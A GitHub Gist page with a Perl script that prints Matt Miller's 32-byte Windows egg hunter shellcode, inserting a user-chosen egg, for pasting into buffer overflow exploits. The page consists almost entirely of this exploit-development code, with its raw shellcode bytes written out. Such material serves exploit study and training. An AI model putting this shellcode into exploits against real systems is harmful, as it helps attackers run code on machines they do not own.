Skip to content

Instantly share code, notes, and snippets.

@ruvolof ruvolof/egghunter.pl

Last active Nov 17, 2019
Embed
What would you like to do?
Generate 32 bytes egg hunter code, based on Matt Miller's implementation
#!/usr/bin/perl
# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344
use strict;
use warnings;
# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";
my $egg = $ARGV[0];
my @chars = ($egg =~ m/../g);
print("# Egghunter 32 bytes - Egg: $egg\n\n");
printf($egghunter, @chars);
print("\n");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.